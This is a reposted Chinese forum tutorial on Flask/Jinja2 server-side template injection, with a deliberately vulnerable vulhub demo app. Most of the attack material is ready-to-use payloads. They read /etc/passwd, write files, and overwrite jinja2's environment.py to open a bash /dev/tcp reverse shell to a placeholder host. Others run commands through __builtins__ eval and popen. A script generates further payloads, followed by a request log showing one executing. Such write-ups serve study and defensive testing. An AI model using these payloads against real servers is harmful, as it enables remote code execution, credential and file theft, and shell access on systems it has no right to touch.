Flask jinja2模板注入思路总结

Track-宁邪   ·   发表于 2018-02-27 11:26:14   ·   漏洞文章
<h2 style="box-sizing: border-box; font-family: 微软雅黑; line-height: 1.1; color: rgb(55, 56, 56); margin: 30px 0px 15px; font-size: 18px; white-space: normal; background-color: rgb(255, 255, 255);">前言</h2><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);"><span style="font-weight: 700; box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(0, 176, 80); font-family: impact, chicago;">虽然这个漏洞已经出现很久了，不过偶尔还是能够看到。翻了翻freebuf上好像只有python2的一些payload，方法也不是很全。我找来找去也走了些弯路，小白们可以参考一下。如果有什么错误，欢迎各位指正。</span></p><h2 style="box-sizing: border-box; font-family: 微软雅黑; line-height: 1.1; color: rgb(55, 56, 56); margin: 30px 0px 15px; font-size: 18px; white-space: normal; background-color: rgb(255, 255, 255);">漏洞简介</h2><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);">常见payload</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);">ssti可以用于xss，不过这里不具体介绍； 前面两篇文章给出了几个比较常用的getshell的payload; 我会总结并补充一些。</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);">python2:</p><pre style="box-sizing: border-box; overflow: auto; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; padding: 9.5px; margin-top: 0px; margin-bottom: 15px; line-height: 1.42857; color: rgb(51, 51, 51); word-break: break-all; word-wrap: break-word; background-color: rgb(243, 243, 243); border: 1px solid rgb(228, 228, 228); border-radius: 4px;">#注入变量执行命令详见&nbsp;http://www.freebuf.com/articles/web/98928.html#读文件：{{&nbsp;&#39;&#39;.__class__.__mro__[2].__subclasses__()[40](&#39;/etc/passwd&#39;).read()&nbsp;}}#写文件：{{&nbsp;&#39;&#39;.__class__.__mro__[2].__subclasses__()[40](&#39;/tmp/1&#39;).write("")&nbsp;}}</pre><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);">也可以通过写jinja2的environment.py执行命令; jinja2的模板会load这个module，而且这个environment.py import了os模块, 所以只要能写这个文件，就可以执行任意命令:</p><pre style="box-sizing: border-box; overflow: auto; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; padding: 9.5px; margin-top: 0px; margin-bottom: 15px; line-height: 1.42857; color: rgb(51, 51, 51); word-break: break-all; word-wrap: break-word; background-color: rgb(243, 243, 243); border: 1px solid rgb(228, 228, 228); border-radius: 4px;">#假设在/usr/lib/python2.7/dist-packages/jinja2/environment.py,&nbsp;弹一个shell{{&nbsp;&#39;&#39;.__class__.__mro__[2].__subclasses__()[40](&#39;/usr/lib/python2.7/dist-packages/jinja2/environment.py&#39;).write("\nos.system(&#39;bash&nbsp;-i&nbsp;>&&nbsp;/dev/tcp/[IP_ADDR]/[PORT]&nbsp;0>&1&#39;)")&nbsp;}}</pre><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);">python3:</p><pre style="box-sizing: border-box; overflow: auto; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; padding: 9.5px; margin-top: 0px; margin-bottom: 15px; line-height: 1.42857; color: rgb(51, 51, 51); word-break: break-all; word-wrap: break-word; background-color: rgb(243, 243, 243); border: 1px solid rgb(228, 228, 228); border-radius: 4px;">#命令执行：{%&nbsp;for&nbsp;c&nbsp;in&nbsp;[].__class__.__base__.__subclasses__()&nbsp;%}{%&nbsp;if&nbsp;c.__name__==&#39;catch_warnings&#39;&nbsp;%}{{&nbsp;c.__init__.__globals__[&#39;__builtins__&#39;].eval("__import__(&#39;os&#39;).popen(&#39;id&#39;).read()")&nbsp;}}{%&nbsp;endif&nbsp;%}{%&nbsp;endfor&nbsp;%}#文件操作{%&nbsp;for&nbsp;c&nbsp;in&nbsp;[].__class__.__base__.__subclasses__()&nbsp;%}{%&nbsp;if&nbsp;c.__name__==&#39;catch_warnings&#39;&nbsp;%}{{&nbsp;c.__init__.__globals__[&#39;__builtins__&#39;].open(&#39;filename&#39;,&nbsp;&#39;r&#39;).read()&nbsp;}}{%&nbsp;endif&nbsp;%}{%&nbsp;endfor&nbsp;%}</pre><h3 style="box-sizing: border-box; font-family: 微软雅黑; line-height: 1.1; color: rgb(0, 112, 192); margin: 20px 0px 15px; font-size: 16px; white-space: normal; background-color: rgb(255, 255, 255);">Go Deeper</h3><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);">环境</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);">这里给出的是vulhub的flask ssti漏洞环境 方便复现</p><pre style="box-sizing: border-box; overflow: auto; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; padding: 9.5px; margin-top: 0px; margin-bottom: 15px; line-height: 1.42857; color: rgb(51, 51, 51); word-break: break-all; word-wrap: break-word; background-color: rgb(243, 243, 243); border: 1px solid rgb(228, 228, 228); border-radius: 4px;">#python3#Flask&nbsp;version:0.12.2#Jinja2:&nbsp;2.10from&nbsp;flask&nbsp;import&nbsp;Flask,&nbsp;requestfrom&nbsp;jinja2&nbsp;import&nbsp;Template
app&nbsp;=&nbsp;Flask(__name__)<span class="label label-primary">@app.route(</span>"/")def&nbsp;index():
&nbsp;&nbsp;&nbsp;&nbsp;name&nbsp;=&nbsp;request.args.get(&#39;name&#39;,&nbsp;&#39;guest&#39;)
&nbsp;&nbsp;&nbsp;&nbsp;t&nbsp;=&nbsp;Template("Hello&nbsp;"&nbsp;+&nbsp;name)&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;t.render()if&nbsp;__name__&nbsp;==&nbsp;"__main__":
&nbsp;&nbsp;&nbsp;&nbsp;app.run();</pre><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);"><span style="box-sizing: border-box; font-weight: 700;">__globals__</span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);">其实这些payload的思路大概都是一样的，从python的内置变量出发，通过调用各类型的一些隐藏属性（方法），从而得到我们需要的函数。</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);">其中有一个属性&nbsp;globals&nbsp;很有意思，文档里这样解释：</p><pre style="box-sizing: border-box; overflow: auto; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; padding: 9.5px; margin-top: 0px; margin-bottom: 15px; line-height: 1.42857; color: rgb(51, 51, 51); word-break: break-all; word-wrap: break-word; background-color: rgb(243, 243, 243); border: 1px solid rgb(228, 228, 228); border-radius: 4px;">__globals__:	
A&nbsp;reference&nbsp;to&nbsp;the&nbsp;dictionary&nbsp;that&nbsp;holds&nbsp;the&nbsp;function’s&nbsp;global&nbsp;variables&nbsp;—&nbsp;the&nbsp;global&nbsp;namespace&nbsp;of&nbsp;the&nbsp;module&nbsp;in&nbsp;which&nbsp;the&nbsp;function&nbsp;was&nbsp;defined.	
[Read-only]</pre><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);">也就是说所有的函数都会有一个__globals__属性,它会以一个dict，返回函数所在模块命名空间中的所有变量。 举个例子：</p><pre style="box-sizing: border-box; overflow: auto; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; padding: 9.5px; margin-top: 0px; margin-bottom: 15px; line-height: 1.42857; color: rgb(51, 51, 51); word-break: break-all; word-wrap: break-word; background-color: rgb(243, 243, 243); border: 1px solid rgb(228, 228, 228); border-radius: 4px;">outFuncVar&nbsp;=&nbsp;2def&nbsp;func():
&nbsp;&nbsp;&nbsp;&nbsp;inFuncVar&nbsp;=&nbsp;1
&nbsp;&nbsp;&nbsp;&nbsp;passprint(func)
print(func.__globals__)import&nbsp;os
print(func.__globals__)</pre><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);">这段代码输出</p><pre style="box-sizing: border-box; overflow: auto; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; padding: 9.5px; margin-top: 0px; margin-bottom: 15px; line-height: 1.42857; color: rgb(51, 51, 51); word-break: break-all; word-wrap: break-word; background-color: rgb(243, 243, 243); border: 1px solid rgb(228, 228, 228); border-radius: 4px;"><function&nbsp;func&nbsp;at&nbsp;0x000001A0B8777F28>
{&#39;outFuncVar&#39;:&nbsp;2,&nbsp;,&nbsp;&#39;__builtins__&#39;:&nbsp;<module&nbsp;&#39;builtins&#39;&nbsp;(built-in)>}
{&#39;outFuncVar&#39;:&nbsp;2,&nbsp;,&nbsp;&#39;os&#39;:&nbsp;<module&nbsp;&#39;os&#39;&nbsp;from&nbsp;&#39;F:\\Python\\lib\\os.py&#39;>,&nbsp;&#39;__builtins__&#39;:&nbsp;<module&nbsp;&#39;builtins&#39;&nbsp;(built-in)>}</pre><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);">可以看到__globals__中会包括引入了的modules；同时每个python脚本都会自动加载 builtins 这个模块，而且这个模块包括了很多强大的built-in 函数，例如eval, exec, open等等。</p><pre style="box-sizing: border-box; overflow: auto; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; padding: 9.5px; margin-top: 0px; margin-bottom: 15px; line-height: 1.42857; color: rgb(51, 51, 51); word-break: break-all; word-wrap: break-word; background-color: rgb(243, 243, 243); border: 1px solid rgb(228, 228, 228); border-radius: 4px;">>>>&nbsp;def&nbsp;test():
	pass>>>&nbsp;test.__globals__[&#39;__builtins__&#39;]
<module&nbsp;&#39;builtins&#39;&nbsp;(built-in)>>>>&nbsp;test.__globals__[&#39;__builtins__&#39;].eval
<built-in&nbsp;function&nbsp;eval>>>>&nbsp;test.__globals__[&#39;__builtins__&#39;].exec<built-in&nbsp;function&nbsp;exec>>>>&nbsp;test.__globals__[&#39;__builtins__&#39;].open
<built-in&nbsp;function&nbsp;open></pre><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);">所以要从内置变量出发找到一个可以达成payload的函数（eval, exec..），只需要随便从一个内置变量调用隐藏属性，找到任意一个函数，然后查看它的__globals__[&#39;__builtins __&#39;]就可以了，而这个是非常容易的。</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);"><span style="box-sizing: border-box; font-weight: 700;">start to find a payload</span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);">我们都知道python的类有被称为Special method names的方法，这些方法会在特定的时候被调用。而开发者可以通过重载这些函数实现各种简洁又强大的功能。例如class.__init __ 会在一个实例被new()创建的时候自动调用，从而起到构造函数的作用。</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);">而我们的目标只是找到任意一个函数，所以我们只需要去找这些函数就可以了，比如说从字符串开始</p><pre style="box-sizing: border-box; overflow: auto; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; padding: 9.5px; margin-top: 0px; margin-bottom: 15px; line-height: 1.42857; color: rgb(51, 51, 51); word-break: break-all; word-wrap: break-word; background-color: rgb(243, 243, 243); border: 1px solid rgb(228, 228, 228); border-radius: 4px;">#python3#__class__返回调用的参数类型#__base__返回基类#__mro__寻找基类时参考类#__sublclasses__()返回子类#获得&nbsp;object&nbsp;类的子类>>>&nbsp;&#39;&#39;.__class__.__base__.__subclasses__()
[<class&nbsp;&#39;str_iterator&#39;>,&nbsp;<class&nbsp;&#39;mappingproxy&#39;>,&nbsp;<class&nbsp;&#39;idlelib.AutoComplete.AutoComplete&#39;>,&nbsp;<class&nbsp;&#39;pydoc.ModuleScanner&#39;>,&nbsp;<class&nbsp;&#39;contextlib.ContextDecorator&#39;>,&nbsp;<class&nbsp;&#39;textwrap.TextWrapper&#39;>,&nbsp;<class&nbsp;&#39;socketserver.ThreadingMixIn&#39;>,&nbsp;<class&nbsp;&#39;_tkinter.tktimertoken&#39;>,&nbsp;...]#从中随便选一个类,查看它的__init__>>>&nbsp;&#39;&#39;.__class__.__base__.__subclasses__()[30].__init__<slot&nbsp;wrapper&nbsp;&#39;__init__&#39;&nbsp;of&nbsp;&#39;object&#39;&nbsp;objects>#&nbsp;wrapper是指这些函数并没有被重载，这时他们并不是function，不具有__globals__属性>>>&nbsp;&#39;&#39;.__class__.__base__.__subclasses__()[30].__init__.__globals__Traceback&nbsp;(most&nbsp;recent&nbsp;call&nbsp;last):
&nbsp;&nbsp;File&nbsp;"<pyshell#8>",&nbsp;line&nbsp;1,&nbsp;in&nbsp;<module>
&nbsp;&nbsp;&nbsp;&nbsp;&#39;&#39;.__class__.__base__.__subclasses__()[30].__init__.__globals__AttributeError:&nbsp;&#39;wrapper_descriptor&#39;&nbsp;object&nbsp;has&nbsp;no&nbsp;attribute&nbsp;&#39;__globals__&#39;#再换几个子类，很快就能找到一个重载过__init__的类，比如>>>&nbsp;&#39;&#39;.__class__.__base__.__subclasses__()[5].__init__<function&nbsp;TarFile.__init__&nbsp;at&nbsp;0x0000019D685A8158>>>>&nbsp;&#39;&#39;.__class__.__base__.__subclasses__()[5].__init__.__globals__[&#39;__builtins__&#39;][&#39;eval&#39;]
<built-in&nbsp;function&nbsp;eval>#然后用eval执行命令即可</pre><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);">其中寻找function的过程可以用一个小脚本解决, 脚本找到被重载过的function，然后组成payload</p><pre style="box-sizing: border-box; overflow: auto; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; padding: 9.5px; margin-top: 0px; margin-bottom: 15px; line-height: 1.42857; color: rgb(51, 51, 51); word-break: break-all; word-wrap: break-word; background-color: rgb(243, 243, 243); border: 1px solid rgb(228, 228, 228); border-radius: 4px;">#!/usr/bin/python3#&nbsp;coding=utf-8#&nbsp;python&nbsp;3.5from&nbsp;flask&nbsp;import&nbsp;Flaskfrom&nbsp;jinja2&nbsp;import&nbsp;Template#&nbsp;Some&nbsp;of&nbsp;special&nbsp;namessearchList&nbsp;=&nbsp;[&#39;__init__&#39;,&nbsp;"__new__",&nbsp;&#39;__del__&#39;,&nbsp;&#39;__repr__&#39;,&nbsp;&#39;__str__&#39;,&nbsp;&#39;__bytes__&#39;,&nbsp;&#39;__format__&#39;,&nbsp;&#39;__lt__&#39;,&nbsp;&#39;__le__&#39;,&nbsp;&#39;__eq__&#39;,&nbsp;&#39;__ne__&#39;,&nbsp;&#39;__gt__&#39;,&nbsp;&#39;__ge__&#39;,&nbsp;&#39;__hash__&#39;,&nbsp;&#39;__bool__&#39;,&nbsp;&#39;__getattr__&#39;,&nbsp;&#39;__getattribute__&#39;,&nbsp;&#39;__setattr__&#39;,&nbsp;&#39;__dir__&#39;,&nbsp;&#39;__delattr__&#39;,&nbsp;&#39;__get__&#39;,&nbsp;&#39;__set__&#39;,&nbsp;&#39;__delete__&#39;,&nbsp;&#39;__call__&#39;,&nbsp;"__instancecheck__",&nbsp;&#39;__subclasscheck__&#39;,&nbsp;&#39;__len__&#39;,&nbsp;&#39;__length_hint__&#39;,&nbsp;&#39;__missing__&#39;,&#39;__getitem__&#39;,&nbsp;&#39;__setitem__&#39;,&nbsp;&#39;__iter__&#39;,&#39;__delitem__&#39;,&nbsp;&#39;__reversed__&#39;,&nbsp;&#39;__contains__&#39;,&nbsp;&#39;__add__&#39;,&nbsp;&#39;__sub__&#39;,&#39;__mul__&#39;]
neededFunction&nbsp;=&nbsp;[&#39;eval&#39;,&nbsp;&#39;open&#39;,&nbsp;&#39;exec&#39;]
pay&nbsp;=&nbsp;int(input("Payload?[1|0]"))for&nbsp;index,&nbsp;i&nbsp;in&nbsp;enumerate({}.__class__.__base__.__subclasses__()):&nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;attr&nbsp;in&nbsp;searchList:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;hasattr(i,&nbsp;attr):&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;eval(&#39;str(i.&#39;+attr+&#39;)[1:9]&#39;)&nbsp;==&nbsp;&#39;function&#39;:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;goal&nbsp;in&nbsp;neededFunction:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(eval(&#39;"&#39;+goal+&#39;"&nbsp;in&nbsp;i.&#39;+attr+&#39;.__globals__["__builtins__"].keys()&#39;)):&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;pay&nbsp;!=&nbsp;1:
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(i.__name__,":",&nbsp;attr,&nbsp;goal)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else:
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print("{%&nbsp;for&nbsp;c&nbsp;in&nbsp;[].__class__.__base__.__subclasses__()&nbsp;%}{%&nbsp;if&nbsp;c.__name__==&#39;"&nbsp;+&nbsp;i.__name__&nbsp;+&nbsp;"&#39;&nbsp;%}{{&nbsp;c."&nbsp;+&nbsp;attr&nbsp;+&nbsp;".__globals__[&#39;__builtins__&#39;]."&nbsp;+&nbsp;goal&nbsp;+&nbsp;"(\"[evil]\")&nbsp;}}{%&nbsp;endif&nbsp;%}{%&nbsp;endfor&nbsp;%}")</pre><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);">output</p><pre style="box-sizing: border-box; overflow: auto; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; padding: 9.5px; margin-top: 0px; margin-bottom: 15px; line-height: 1.42857; color: rgb(51, 51, 51); word-break: break-all; word-wrap: break-word; background-color: rgb(243, 243, 243); border: 1px solid rgb(228, 228, 228); border-radius: 4px;">{%&nbsp;for&nbsp;c&nbsp;in&nbsp;[].__class__.__base__.__subclasses__()&nbsp;%}{%&nbsp;if&nbsp;c.__name__==&#39;_Unframer&#39;&nbsp;%}{{&nbsp;c.__init__.__globals__[&#39;__builtins__&#39;].exec("[evil]")&nbsp;}}{%&nbsp;endif&nbsp;%}{%&nbsp;endfor&nbsp;%}{%&nbsp;for&nbsp;c&nbsp;in&nbsp;[].__class__.__base__.__subclasses__()&nbsp;%}{%&nbsp;if&nbsp;c.__name__==&#39;ImmutableDictMixin&#39;&nbsp;%}{{&nbsp;c.__hash__.__globals__[&#39;__builtins__&#39;].eval("[evil]")&nbsp;}}{%&nbsp;endif&nbsp;%}{%&nbsp;endfor&nbsp;%}{%&nbsp;for&nbsp;c&nbsp;in&nbsp;[].__class__.__base__.__subclasses__()&nbsp;%}{%&nbsp;if&nbsp;c.__name__==&#39;ImmutableDictMixin&#39;&nbsp;%}{{&nbsp;c.__hash__.__globals__[&#39;__builtins__&#39;].open("[evil]")&nbsp;}}{%&nbsp;endif&nbsp;%}{%&nbsp;endfor&nbsp;%}...</pre><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);">随便选一个payload填上命令</p><pre style="box-sizing: border-box; overflow: auto; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; padding: 9.5px; margin-top: 0px; margin-bottom: 15px; line-height: 1.42857; color: rgb(51, 51, 51); word-break: break-all; word-wrap: break-word; background-color: rgb(243, 243, 243); border: 1px solid rgb(228, 228, 228); border-radius: 4px;">#Client&nbsp;requesthttp://127.0.0.1:5000/?name={%&nbsp;for&nbsp;c&nbsp;in&nbsp;[].__class__.__base__.__subclasses__()&nbsp;%}{%&nbsp;if&nbsp;c.__name__==&#39;ImmutableDictMixin&#39;&nbsp;%}{{&nbsp;c.__hash__.__globals__[&#39;__builtins__&#39;].eval("print(&#39;hello&nbsp;shell&#39;)")&nbsp;}}{%&nbsp;endif&nbsp;%}{%&nbsp;endfor&nbsp;%}#server&nbsp;terminal#成功打印出&nbsp;hello&nbsp;shell,&nbsp;说明成功执行hello&nbsp;shell127.0.0.1&nbsp;-&nbsp;-&nbsp;[10/Feb/2018&nbsp;02:41:48]&nbsp;"GET&nbsp;/?name={%%20for%20c%20in%20[].__class__.__base__.__subclasses__()%20%}{%%20if%20c.__name__==%27ImmutableDictMixin%27%20%}{{%20c.__hash__.__globals__[%27__builtins__%27].eval(%22print(%27hello%20shell%27)%22)%20}}{%%20endif%20%}{%%20endfor%20%}&nbsp;HTTP/1.1"&nbsp;200&nbsp;-</pre><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);">当然这种方法不仅仅适合python3, python2也可以用这个方法,上面那个payload就是两个版本都可以使用的。</p><h2 style="box-sizing: border-box; font-family: 微软雅黑; line-height: 1.1; color: rgb(55, 56, 56); margin: 30px 0px 15px; font-size: 18px; white-space: normal; background-color: rgb(255, 255, 255);"><span style="box-sizing: border-box;">总结</span></h2><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);">利用flask的ssti漏洞，可以通过python的内置变量得到功能强大的built-in functions, 从而执行各种命令。而python函数自带的__globals__属性使得寻找built-in functions的过程变得更加简单，不受版本约束。</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; white-space: normal; background-color: rgb(255, 255, 255);"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(159, 163, 168);"><span style="box-sizing: border-box; font-weight: 700;">* 本文作者：请叫我飞翔的翔，转载来自FreeBuf</span></span></p><p><br/></p>

打赏我,让我更有动力~

1 条回复   |  直到 2019-7-8 | 1826 次浏览

xeel
发表于 2019-7-8

PHA+5ZWnIC4gLiDkuIDohLjmh7XpgLx+PC9wPg==

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2025 掌控者 All Rights Reserved.